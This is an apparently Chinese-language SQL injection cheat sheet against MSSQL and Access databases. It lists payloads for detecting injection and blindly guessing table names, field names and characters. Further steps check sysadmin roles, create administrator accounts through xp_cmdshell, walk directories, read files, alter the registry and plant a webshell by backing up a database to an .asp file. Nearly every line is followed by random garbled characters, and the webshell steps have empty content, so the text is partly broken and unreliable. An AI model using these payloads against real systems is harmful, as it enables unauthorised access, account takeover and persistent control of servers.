1.判断是否有注入;and 1=1 ;and 1=2 to�]�1QjW-
2.初步判断是否是mssql ;and user>0 �DH�gE�hf]
q�ZCA�1�6�
3.注入参数是字符'and [查询条件] and ''=' f!0*���^d�
hJ+>Xm�@@!
4.搜索时没过滤参数的'and [查询条件] and '%25'=' yH@�W�6'�.
I>b!�4?��h
5.判断数据库系统 O�N]�
z�-�
�#R'm�|En'
;and (select count(*) from sysobjects)>0 mssql X0�Xs"�--}
G\|VTqu���
;and (select count(*) from msysobjects)>0 access gtVI>D'(W
2c_�#q1/Z/
vX/~34o]�\
�?psv�hB{O
6.猜数据库 ;and (select Count(*) from [数据库名])>0 O�US@)Tyh
zD7\��G�v�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 g�}��P.ksM
;r"Y�Zs&Xd
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Qc�Ia%�lf�
��K"#np!Y)
9.(1)猜字段的ascii值(access) �[|��Jz�s[
)TBB�YCL3�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 O: :X$O��7
i�xE72�bX�
(2)猜字段的ascii值(mssql) �d%u|)
=7�
Ef:.)!;�jy
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 8u!!�a�^F
�j�<Lj1�P3
10.测试权限结构(mssql) �]B5�q��v6
�rpQB#
Pz
,���e�F}�`
aOA�;"j�R1
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- j%�#n�}��H
�<�p-R�{}8
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- E�+�]g��C
Iyz}�;7yVI
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- i�RBUX�`�0
^�CDQ75tR�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- !#5R�P5,,Y
�Gt2�NUGU�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- Q�f6Vj,~�N
CA��X��|�[
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- CES^
c-. k
�E,>/�6A�U
;and 1=(select IS_MEMBER('db_owner'));-- O*`�] �]w]
VSL6t�Q��p
G=��!Gy�.
4�b,N"w{v
11.添加mssql和系统的帐户 {%)��bxk�6
�f�nN�"a Z
;exec master.dbo.sp_addlogin username;-- aP>%iRk'J!
;exec master.dbo.sp_password null,username,password;-- )lT�kq�z8v
wm=!tx\`k�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- =3_I;L��w�
D[��-V1K&g
;exec master.dbo.xp_cmdshell 'net user username password 7D@�O�:y�O
�>Ke4�lO�"
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- F)z]��QJOw
�?MH�VkGD�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- Uw8O"}U8
5���<0&y3�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- t"c�G�v32b
�Pe�EC|&x�
=EA*h�_"q9
W`*S?QGzl@
12.(1)遍历目录 ogtKj��"a
4@&8jZ)a��
;create table dirs(paths varchar(100), id int) "W?<BpV~@!
+�ng8�!k��
;insert dirs exec master.dbo.xp_dirtree 'c:\' {r?O>KDQf(
$��8k�c�1Q
;and (select top 1 paths from dirs)>0 G�&I\Za;��
)+'FTz` c�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) @{��_[b�Kg
-R?~Yysd7K
m}5���4yo
���"7(2��m
(2)遍历目录 d3v5�^5k�U
)hGRq'�WA=
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- w�f�)T�-]e
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �R�^.E";/h
<5%x3e"�7u
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �jQ�x�v`�H
sgW*0����o
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �{��d�M18;
�dMK�|�l �
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 JS]�6jUB<B
/o Q�^�j'v
��9D#"��Ey
V�^�Z"FwWk
13.mssql中的存储过程 6 �9�_et�v
A.8{LY���;
xp_regenumvalues 注册表根键, 子键 hsr,a�{B%$
�LmE�%`qNg
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 2Dgulx5kGZ
�o?�BcpWp�
xp_regread 根键,子键,键值名 &ejJf{id��
!ba /]�A�/
;exec xp_regread C�bv$O� o*
#�E�Q�wl�6
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �u�/-u��l
b��+�bgGLo
xp_regwrite 根键,子键, 值名, 值类型, 值 �3WZdP[o�!
ZV=O oL�t,
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 E%@�,n9T~"
7D PKKv�Q
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ,��Dd�
)=
�`a2��%U/U
xp_regdeletevalue 根键,子键,值名 SIQ�7oxS4
q$6fb)2I]e
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 "�Qj;�pqR
��YC+}H3�3
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �c�y T,tN�
Eh�/B[u7T[
kcGs2�Y_*&
)!M �%clm.
14.mssql的backup创建webshell �\ �<b-I��
}i0(^"SoXZ
use model ��px�y=edd
J�G\T2/b��
create table cmd(str image); "��|ZC2Zu<
�|�+K3��\b
insert into cmd(str) values (''); �M��*l��i;
/D2
cY>���
backup database model to disk='c:\l.asp'; *M6'
GT1%c
EX zA(igS�
L@xag-�b
i
^oaFnzJd�f
15.mssql内置函数 ��B7HN�N�X
W?i�s8�r�:
;and (select @@version)>0 获得Windows的版本号 /�o�%J /�|
6%?bl{pN�n
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Z&BJ/qk
\-
]�U?)_P�@}
;and (select user_name())>0 爆当前系统的连接用户 ,tqMMBwC~_
3R�un.�Gv\
;and (select db_name())>0 得到当前连接的数据库 �V/xGk9�L~
8�ExEhB�X8
)%H@.;cD_r
k<x�P�g�5�
16.简洁的webshell [HNWM/ff7+
=q�G%h5]n
use model 7:iTx�;,�v
_gDE�I�oBp
create table cmd(str image); `P/�7�M��f
|Rk9���W�
insert into cmd(str) values (''); ��Z{&��dzc
3Ov? kWFO
backup database model to disk='g:\wwwtest\l.asp';
